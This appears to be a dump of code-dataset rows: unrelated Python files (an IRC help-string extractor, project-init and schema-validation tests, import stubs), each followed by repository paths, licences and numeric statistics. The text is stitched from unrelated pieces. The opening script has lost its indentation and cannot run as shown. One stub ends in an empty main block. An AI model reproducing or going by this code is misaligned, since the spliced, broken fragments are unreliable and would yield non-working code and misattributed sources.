with open(os.path.join(arguments['<languages-dir>'], 'example', 'help.lang.json'), 'w') as f:
f.write(json.dumps({k:k for k in help_strings}, sort_keys=True, indent=2, separators=(',', ': ')))
f.write('\n')
for string in help_strings:
if 1 < string.count('%s') + string.count('%d') + string.count('%f'):
print(' confirm:', string.split('\n')[0])
# nickserv help entries
help_strings = []
for subdir, dirs, files in os.walk(arguments['<irc-dir>']):
for fname in files:
filepath = subdir + os.sep + fname
if fname == 'nickserv.go':
content = open(filepath, 'r', encoding='UTF-8').read()
matches = re.findall(r'\`([^\`]+)\`', content)
for match in matches:
if match not in help_strings:
help_strings.append(match)
for s in ignored_strings:
try:
help_strings.remove(s)
except ValueError:
# ignore any that don't exist
...
print("nickserv help strings:", len(help_strings))
with open(os.path.join(arguments['<languages-dir>'], 'example', 'nickserv.lang.json'), 'w') as f:
f.write(json.dumps({k:k for k in help_strings}, sort_keys=True, indent=2, separators=(',', ': ')))
f.write('\n')
for string in help_strings:
if 1 < string.count('%s') + string.count('%d') + string.count('%f'):
print(' confirm:', string)
# chanserv help entries
help_strings = []
for subdir, dirs, files in os.walk(arguments['<irc-dir>']):
for fname in files:
filepath = subdir + os.sep + fname
if fname == 'chanserv.go':
content = open(filepath, 'r', encoding='UTF-8').read()
matches = re.findall(r'\`([^\`]+)\`', content)
for match in matches:
if match not in help_strings:
help_strings.append(match)
for s in ignored_strings:
try:
help_strings.remove(s)
except ValueError:
# ignore any that don't exist
...
print("chanserv help strings:", len(help_strings))
with open(os.path.join(arguments['<languages-dir>'], 'example', 'chanserv.lang.json'), 'w') as f:
f.write(json.dumps({k:k for k in help_strings}, sort_keys=True, indent=2, separators=(',', ': ')))
f.write('\n')
for string in help_strings:
if 1 < string.count('%s') + string.count('%d') + string.count('%f'):
print(' confirm:', string)
# hostserv help entries
help_strings = []
for subdir, dirs, files in os.walk(arguments['<irc-dir>']):
for fname in files:
filepath = subdir + os.sep + fname
if fname == 'hostserv.go':
content = open(filepath, 'r', encoding='UTF-8').read()
matches = re.findall(r'\`([^\`]+)\`', content)
for match in matches:
if match not in help_strings:
help_strings.append(match)
for s in ignored_strings:
try:
help_strings.remove(s)
except ValueError:
# ignore any that don't exist
...
print("hostserv help strings:", len(help_strings))
with open(os.path.join(arguments['<languages-dir>'], 'example', 'hostserv.lang.json'), 'w') as f:
f.write(json.dumps({k:k for k in help_strings}, sort_keys=True, indent=2, separators=(',', ': ')))
f.write('\n')
for string in help_strings:
if 1 < string.count('%s') + string.count('%d') + string.count('%f'):
print(' confirm:', string)
| 37.887755 | 110 | 0.524239 | 862 | 7,426 | 4.446636 | 0.194896 | 0.091834 | 0.040699 | 0.026611 | 0.72502 | 0.72502 | 0.72502 | 0.72502 | 0.72502 | 0.719019 | 0 | 0.005509 | 0.340022 | 7,426 | 195 | 111 | 38.082051 | 0.776576 | 0.15917 | 0 | 0.728 | 0 | 0 | 0.102172 | 0.003862 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0.08 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
ed7fc7d6fb252e1b75bf1b904b18ffd861a8c42f
| 1,162 |
py
|
Python
|
testproject/testapp/tests/__init__.py
|
movermeyer/django-firestone
|
e045089f6ff4a6686633f9c5909c314a010bd4a0
|
[
"WTFPL"
] | 1 |
2017-03-08T22:58:35.000Z
|
2017-03-08T22:58:35.000Z
|
testproject/testapp/tests/__init__.py
|
movermeyer/django-firestone
|
e045089f6ff4a6686633f9c5909c314a010bd4a0
|
[
"WTFPL"
] | null | null | null |
testproject/testapp/tests/__init__.py
|
movermeyer/django-firestone
|
e045089f6ff4a6686633f9c5909c314a010bd4a0
|
[
"WTFPL"
] | 1 |
2018-03-05T17:40:55.000Z
|
2018-03-05T17:40:55.000Z
|
from test_proxy import *
from test_serializers import *
from test_deserializers import *
from test_exceptions import *
from test_authentication import *
from test_whole_flow import *
from test_handlers_metaclass_magic import *
from test_handlers_serialize_to_python import *
from test_handlers_is_method_allowed import *
from test_handlers_data_control import *
from test_handlers_package import *
from test_handlers_finalize_pending import *
from test_handlers_cleanse_body import *
from test_handlers_validate import *
from test_handlers_clean_models import *
from test_handlers_get import *
from test_handlers_is_catastrophic import *
from test_handlers_post import *
from test_handlers_put import *
from test_handlers_delete import *
from test_handlers_patch_response import *
from test_handlers_authentication_hook import *
from test_handlers_filter_data import *
from test_handlers_order import *
from test_handlers_order_data import *
from test_handlers_paginate import *
from test_handlers_paginate_data import *
from test_handlers_inject_data_hook import *
from test_handlers_handle_exception import *
from test_handlers_deserialize_body import *
| 31.405405 | 47 | 0.865749 | 164 | 1,162 | 5.682927 | 0.268293 | 0.257511 | 0.435622 | 0.566524 | 0.266094 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108434 | 1,162 | 36 | 48 | 32.277778 | 0.899614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
ed8c508acbabfde1092353a8acaec8aac8951535
| 47 |
py
|
Python
|
library/libvirt_filter.py
|
bkmeneguello/ansible-role-libvirt
|
e7f82077b1fd4c2ec5afa463973ecde599209549
|
[
"MIT"
] | 1 |
2019-02-19T19:41:36.000Z
|
2019-02-19T19:41:36.000Z
|
library/libvirt_filter.py
|
bkmeneguello/ansible-role-libvirt
|
e7f82077b1fd4c2ec5afa463973ecde599209549
|
[
"MIT"
] | null | null | null |
library/libvirt_filter.py
|
bkmeneguello/ansible-role-libvirt
|
e7f82077b1fd4c2ec5afa463973ecde599209549
|
[
"MIT"
] | null | null | null |
# TODO: https://libvirt.org/formatnwfilter.html
| 47 | 47 | 0.787234 | 6 | 47 | 6.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042553 | 47 | 1 | 47 | 47 | 0.822222 | 0.957447 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 1 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
71f16750be3a7d0922d774531a82147a9b72ab6b
| 44 |
py
|
Python
|
scrapper/playstation/__init__.py
|
gghf-service/gghf-api
|
9740700d1dd160e90fc949f9c3e652c3483a49aa
|
[
"MIT"
] | 1 |
2018-12-10T14:37:11.000Z
|
2018-12-10T14:37:11.000Z
|
scrapper/playstation/__init__.py
|
tapkain/gghf.api
|
9740700d1dd160e90fc949f9c3e652c3483a49aa
|
[
"MIT"
] | null | null | null |
scrapper/playstation/__init__.py
|
tapkain/gghf.api
|
9740700d1dd160e90fc949f9c3e652c3483a49aa
|
[
"MIT"
] | null | null | null |
from scrapper.playstation.spider import main
| 44 | 44 | 0.886364 | 6 | 44 | 6.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 44 | 1 | 44 | 44 | 0.95122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
71fafe5ef80b5403322b57c793f98a2f2f5a763c
| 213 |
py
|
Python
|
venv/lib/python3.9/site-packages/py2app/bootstrap/disable_linecache.py
|
dequeb/asmbattle
|
27e8b209de5787836e288a2f2f9b7644ce07563e
|
[
"MIT"
] | 193 |
2020-01-15T09:34:20.000Z
|
2022-03-18T19:14:16.000Z
|
.eggs/py2app-0.21-py3.7.egg/py2app/bootstrap/disable_linecache.py
|
mdanisurrahmanrony/Covid-Doctor
|
1e0e854d01325c1a18dd52f33064aed4c21b8161
|
[
"Apache-2.0"
] | 185 |
2020-01-15T08:38:27.000Z
|
2022-03-27T17:29:29.000Z
|
.eggs/py2app-0.21-py3.7.egg/py2app/bootstrap/disable_linecache.py
|
mdanisurrahmanrony/Covid-Doctor
|
1e0e854d01325c1a18dd52f33064aed4c21b8161
|
[
"Apache-2.0"
] | 23 |
2020-01-24T14:47:18.000Z
|
2022-02-22T17:19:47.000Z
|
def _disable_linecache():
import linecache
def fake_getline(*args, **kwargs):
return ""
linecache.orig_getline = linecache.getline
linecache.getline = fake_getline
_disable_linecache()
| 17.75 | 46 | 0.704225 | 22 | 213 | 6.5 | 0.454545 | 0.223776 | 0.321678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.206573 | 213 | 11 | 47 | 19.363636 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | true | 0 | 0.142857 | 0.142857 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 |
0
| 6 |
9c1b5e47507c017924313ed766676fc6ec9af4a7
| 316 |
py
|
Python
|
tests/test_data/lazy_mod.py
|
brettcannon/modutil
|
a34794ffee9b6217a9ced41baddab09b4f034cbb
|
[
"BSD-3-Clause"
] | 17 |
2018-04-21T01:15:52.000Z
|
2021-01-16T23:58:51.000Z
|
tests/test_data/lazy_mod.py
|
brettcannon/modutil
|
a34794ffee9b6217a9ced41baddab09b4f034cbb
|
[
"BSD-3-Clause"
] | 9 |
2018-04-20T23:29:07.000Z
|
2019-07-25T17:21:29.000Z
|
tests/test_data/lazy_mod.py
|
brettcannon/modutil
|
a34794ffee9b6217a9ced41baddab09b4f034cbb
|
[
"BSD-3-Clause"
] | 3 |
2020-02-27T18:10:01.000Z
|
2021-01-05T07:22:19.000Z
|
import modutil
mod, __getattr__ = modutil.lazy_import(__name__,
['tests.test_data.A', '.B', '.C as still_C'])
def trigger_A():
return mod.A
def trigger_B():
return mod.B
def trigger_C():
return mod.still_C
def trigger_failure():
return mod.does_not_exist
| 17.555556 | 84 | 0.607595 | 44 | 316 | 3.954545 | 0.477273 | 0.229885 | 0.103448 | 0.183908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.278481 | 316 | 17 | 85 | 18.588235 | 0.763158 | 0 | 0 | 0 | 0 | 0 | 0.101266 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.363636 | true | 0 | 0.181818 | 0.363636 | 0.909091 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 |
0
| 6 |
9c47360ad31544c866959d439dec3d10ef843fd1
| 2,730 |
py
|
Python
|
package/tests/test_init_command.py
|
MrKriss/stonemason
|
d78becc9168c2566b31b48c9a951e2823bc98362
|
[
"MIT"
] | 2 |
2017-11-13T17:40:52.000Z
|
2021-05-08T15:58:28.000Z
|
package/tests/test_init_command.py
|
MrKriss/masonry
|
d78becc9168c2566b31b48c9a951e2823bc98362
|
[
"MIT"
] | 3 |
2017-09-03T22:58:37.000Z
|
2017-09-12T21:45:27.000Z
|
package/tests/test_init_command.py
|
MrKriss/stonemason
|
d78becc9168c2566b31b48c9a951e2823bc98362
|
[
"MIT"
] | null | null | null |
from pathlib import Path
import pytest
import git
import json
from conftest import TEST_DIR
def test_init_with_project(tmpdir):
output_path = Path(tmpdir.strpath)
# Set arguments
args = f"init -o {output_path} {TEST_DIR}/example_templates/python_project"
from masonry import main
# Run from entry point
main.main(args=args)
# Check files were created
package_name = 'testpackage'
files = [
'.git/',
'.mason',
'MANIFEST.in',
'README',
'requirements.txt',
'setup.py',
'src/testpackage',
'src/testpackage/__init__.py',
'src/testpackage/main.py'
]
for f in files:
p = output_path / package_name / f
assert p.exists()
# Check requirements were polulated
target = "requests\nlogzero\n"
req_file = output_path / package_name / 'requirements.txt'
result = req_file.read_text()
assert result == target
# Check git repo was created and commits made
repo_dir = output_path / package_name
r = git.Repo(repo_dir.as_posix())
log = r.git.log(pretty='oneline').split('\n')
assert len(log) == 1
assert "Add 'package' template layer via stone mason." in log[0]
def test_init_with_project_and_template(tmpdir, no_prompts):
output_path = Path(tmpdir.strpath)
# Set arguments
args = f"init -o {output_path} {TEST_DIR}/example_templates/python_project/pytest"
from masonry import main
# Run from entry point
main.main(args=args)
# Check files were created
package_name = 'testpackage'
files = [
'.git/',
'.mason',
'MANIFEST.in',
'README',
'requirements.txt',
'setup.py',
'src/testpackage',
'src/testpackage/__init__.py',
'src/testpackage/main.py',
'tests/test_foo.py'
]
for f in files:
p = output_path / package_name / f
assert p.exists()
# Check requirements were polulated
target = "requests\nlogzero\npytest\npytest-cov\ncoverage\n"
req_file = output_path / package_name / 'requirements.txt'
result = req_file.read_text()
assert result == target
# Check MANIFEST was prefixed
target = "graft tests\ngraft src\n"
manifest_file = output_path / package_name / 'MANIFEST.in'
result = manifest_file.read_text()
assert result == target
# Check git repo was created and commits made
repo_dir = output_path / package_name
r = git.Repo(repo_dir.as_posix())
log = r.git.log(pretty='oneline').split('\n')
assert len(log) == 2
assert "Add 'pytest' template layer via stone mason." in log[0]
assert "Add 'package' template layer via stone mason." in log[1]
| 26.764706 | 86 | 0.642125 | 355 | 2,730 | 4.769014 | 0.256338 | 0.064973 | 0.070289 | 0.086828 | 0.853514 | 0.812758 | 0.812758 | 0.812758 | 0.793266 | 0.793266 | 0 | 0.002443 | 0.250183 | 2,730 | 101 | 87 | 27.029703 | 0.824621 | 0.110989 | 0 | 0.652174 | 0 | 0 | 0.288732 | 0.100249 | 0 | 0 | 0 | 0 | 0.144928 | 1 | 0.028986 | false | 0 | 0.101449 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
9c68e55390ec5a85f2cfdfcd46e61487ba6ce000
| 9,871 |
py
|
Python
|
tests/unit/ppr/test_search_query.py
|
doug-lovett/test-schemas-dl
|
a05e87b983f2c3559c081dd65aff05e2c67e6186
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/ppr/test_search_query.py
|
doug-lovett/test-schemas-dl
|
a05e87b983f2c3559c081dd65aff05e2c67e6186
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/ppr/test_search_query.py
|
doug-lovett/test-schemas-dl
|
a05e87b983f2c3559c081dd65aff05e2c67e6186
|
[
"Apache-2.0"
] | null | null | null |
# Copyright © 2020 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test Suite to ensure the PPR Search Query schema is valid.
"""
import copy
from registry_schemas import validate
from registry_schemas.example_data.ppr import SEARCH_QUERY
def test_valid_search_query_ind_debtor():
"""Assert that the schema is performing as expected for a search by individual debtor."""
query = copy.deepcopy(SEARCH_QUERY)
query['type'] = 'INDIVIDUAL_DEBTOR'
del query['criteria']['debtorName']['business']
del query['criteria']['value']
del query['clientReferenceId']
del query['startDateTime']
del query['endDateTime']
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert is_valid
def test_valid_search_query_bus_debtor():
"""Assert that the schema is performing as expected for a search by business debtor."""
query = copy.deepcopy(SEARCH_QUERY)
query['type'] = 'BUSINESS_DEBTOR'
del query['criteria']['debtorName']['first']
del query['criteria']['debtorName']['second']
del query['criteria']['debtorName']['last']
del query['criteria']['value']
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert is_valid
def test_valid_search_query_airdot():
"""Assert that the schema is performing as expected for a search by aircraft DOT."""
query = copy.deepcopy(SEARCH_QUERY)
query['type'] = 'AIRCRAFT_DOT'
del query['criteria']['debtorName']
query['criteria']['value'] = 'CFYXW'
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert is_valid
def test_valid_search_query_regnum():
"""Assert that the schema is performing as expected for a search by registration number."""
query = copy.deepcopy(SEARCH_QUERY)
query['type'] = 'REGISTRATION_NUMBER'
del query['criteria']['debtorName']
query['criteria']['value'] = '023001B'
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert is_valid
def test_valid_search_query_mhrnum():
"""Assert that the schema is performing as expected for a search by MHR number."""
query = copy.deepcopy(SEARCH_QUERY)
query['type'] = 'MHR_NUMBER'
del query['criteria']['debtorName']
query['criteria']['value'] = '21324'
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert is_valid
def test_valid_search_query_serialnum():
"""Assert that the schema is performing as expected for a search by serial number."""
query = copy.deepcopy(SEARCH_QUERY)
query['type'] = 'SERIAL_NUMBER'
del query['criteria']['debtorName']
query['criteria']['value'] = 'KM8J3CA46JU622994'
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert is_valid
def test_invalid_search_query_missing_type():
"""Assert that an invalid search query fails - type is missing."""
query = copy.deepcopy(SEARCH_QUERY)
del query['type']
del query['criteria']['debtorName']['business']
del query['criteria']['value']
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
def test_invalid_search_query_missing_criteria():
"""Assert that an invalid search query fails - criteria is missing."""
query = copy.deepcopy(SEARCH_QUERY)
del query['criteria']
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
def test_invalid_search_query_type():
"""Assert that an invalid search query fails - type is invalid."""
query = copy.deepcopy(SEARCH_QUERY)
query['type'] = 'XXXXXXXX'
del query['criteria']['debtorName']['business']
del query['criteria']['value']
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
def test_invalid_search_query_criteria():
"""Assert that an invalid search query fails - criteria is invalid."""
query = copy.deepcopy(SEARCH_QUERY)
del query['criteria']['debtorName']['business']
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
def test_invalid_search_query_busname():
"""Assert that an invalid search query fails - business name is too short."""
query = copy.deepcopy(SEARCH_QUERY)
del query['criteria']['debtorName']['first']
del query['criteria']['debtorName']['second']
del query['criteria']['debtorName']['last']
del query['criteria']['value']
query['criteria']['debtorName']['business'] = 'XXXX'
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
def test_invalid_search_query_value():
"""Assert that an invalid search query fails - value is too long."""
query = copy.deepcopy(SEARCH_QUERY)
del query['criteria']['debtorName']
query['criteria']['value'] = 'XxxxxxxxxxxxxxxxxxxxXxxxxxxxxxxxxxxxxxxxXxxxxxxxxxx'
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
def test_invalid_search_query_debtor():
"""Assert that an invalid search query fails - debtor name is invalid."""
query = copy.deepcopy(SEARCH_QUERY)
del query['criteria']['value']
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
def test_invalid_search_query_firstname():
"""Assert that an invalid search query fails - debtor first name is too long."""
query = copy.deepcopy(SEARCH_QUERY)
del query['criteria']['value']
del query['criteria']['debtorName']['business']
query['criteria']['debtorName']['first'] = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
def test_invalid_search_query_secondname():
"""Assert that an invalid search query fails - debtor second name is too long."""
query = copy.deepcopy(SEARCH_QUERY)
del query['criteria']['value']
del query['criteria']['debtorName']['business']
query['criteria']['debtorName']['second'] = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
def test_invalid_search_query_lastname():
"""Assert that an invalid search query fails - debtor last name is too long."""
query = copy.deepcopy(SEARCH_QUERY)
del query['criteria']['value']
del query['criteria']['debtorName']['business']
query['criteria']['debtorName']['last'] = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
def test_invalid_search_query_clientref():
"""Assert that an invalid search query fails - client reference id is too long."""
query = copy.deepcopy(SEARCH_QUERY)
del query['criteria']['value']
del query['criteria']['debtorName']['business']
query['clientReferenceId'] = 'XxxxxxxxxxXxxxxxxxxxX'
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
def test_invalid_search_query_startts():
"""Assert that an invalid search query fails - start date time format is invalid."""
query = copy.deepcopy(SEARCH_QUERY)
del query['criteria']['value']
del query['criteria']['debtorName']['business']
query['startDateTime'] = 'Xxxxxxxxxx'
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
def test_invalid_search_query_endts():
"""Assert that an invalid search query fails - end date time format is invalid."""
query = copy.deepcopy(SEARCH_QUERY)
del query['criteria']['value']
del query['criteria']['debtorName']['business']
query['endDateTime'] = 'Xxxxxxxxxx'
is_valid, errors = validate(query, 'searchQuery', 'ppr')
if errors:
for err in errors:
print(err.message)
print(errors)
assert not is_valid
| 28.042614 | 95 | 0.668524 | 1,220 | 9,871 | 5.289344 | 0.122951 | 0.090346 | 0.084302 | 0.084612 | 0.824733 | 0.818069 | 0.816829 | 0.76755 | 0.679374 | 0.650085 | 0 | 0.003727 | 0.211731 | 9,871 | 351 | 96 | 28.122507 | 0.825472 | 0.20545 | 0 | 0.783019 | 0 | 0 | 0.195289 | 0.021354 | 0 | 0 | 0 | 0 | 0.089623 | 1 | 0.089623 | false | 0 | 0.014151 | 0 | 0.103774 | 0.179245 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
13037ede58d748bec28747c289956464268c2ceb
| 118 |
py
|
Python
|
ddt/__init__.py
|
GawenChen/test_pytest
|
da7a29dc43e8027d3fd1a05054480ed7007131c3
|
[
"Apache-2.0"
] | null | null | null |
ddt/__init__.py
|
GawenChen/test_pytest
|
da7a29dc43e8027d3fd1a05054480ed7007131c3
|
[
"Apache-2.0"
] | null | null | null |
ddt/__init__.py
|
GawenChen/test_pytest
|
da7a29dc43e8027d3fd1a05054480ed7007131c3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
@Time : 2021/10/9 17:51
@Auth : 潇湘
@File :__init__.py.py
@IDE :PyCharm
@QQ : 810400085
"""
| 14.75 | 23 | 0.576271 | 19 | 118 | 3.368421 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 0.169492 | 118 | 8 | 24 | 14.75 | 0.438776 | 0.923729 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
130e4d54c2deae9e851943dbae96e38707ce57ce
| 46 |
py
|
Python
|
stringtoiso/__init__.py
|
vats98754/stringtoiso
|
985da5efa26111ef1d92b7026b5d5d68f0101ef1
|
[
"MIT"
] | null | null | null |
stringtoiso/__init__.py
|
vats98754/stringtoiso
|
985da5efa26111ef1d92b7026b5d5d68f0101ef1
|
[
"MIT"
] | null | null | null |
stringtoiso/__init__.py
|
vats98754/stringtoiso
|
985da5efa26111ef1d92b7026b5d5d68f0101ef1
|
[
"MIT"
] | null | null | null |
from stringtoiso.convert_to_iso import convert
| 46 | 46 | 0.913043 | 7 | 46 | 5.714286 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065217 | 46 | 1 | 46 | 46 | 0.930233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
134951456249066bc57415ee60860d0f10fe18d8
| 160 |
py
|
Python
|
dev/phonts/visualization/phonts.py
|
eragasa/pypospack
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
[
"MIT"
] | 4 |
2018-01-18T19:59:56.000Z
|
2020-08-25T11:56:52.000Z
|
dev/phonts/visualization/phonts.py
|
eragasa/pypospack
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
[
"MIT"
] | 1 |
2018-04-22T23:02:13.000Z
|
2018-04-22T23:02:13.000Z
|
dev/phonts/visualization/phonts.py
|
eragasa/pypospack
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
[
"MIT"
] | 1 |
2019-09-14T07:04:42.000Z
|
2019-09-14T07:04:42.000Z
|
import pypospack.io.phonts as phonts
# <---- additional classes and functions in which to add top
# <---- pypospack.io.phonts
if __name__ == "__main__":
| 20 | 60 | 0.6875 | 21 | 160 | 4.857143 | 0.809524 | 0.215686 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18125 | 160 | 7 | 61 | 22.857143 | 0.778626 | 0.55 | 0 | 0 | 0 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 6 |
136b533fe267643a58604244ebaf15ea2c8117bd
| 11 |
py
|
Python
|
ls10.py
|
yu961549745/pynote
|
5976aeeca6368c0956baddf6a9ccb93ae8e0612a
|
[
"MIT"
] | null | null | null |
ls10.py
|
yu961549745/pynote
|
5976aeeca6368c0956baddf6a9ccb93ae8e0612a
|
[
"MIT"
] | null | null | null |
ls10.py
|
yu961549745/pynote
|
5976aeeca6368c0956baddf6a9ccb93ae8e0612a
|
[
"MIT"
] | null | null | null |
'''
IO
'''
| 2.75 | 3 | 0.181818 | 1 | 11 | 2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 11 | 3 | 4 | 3.666667 | 0.25 | 0.181818 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
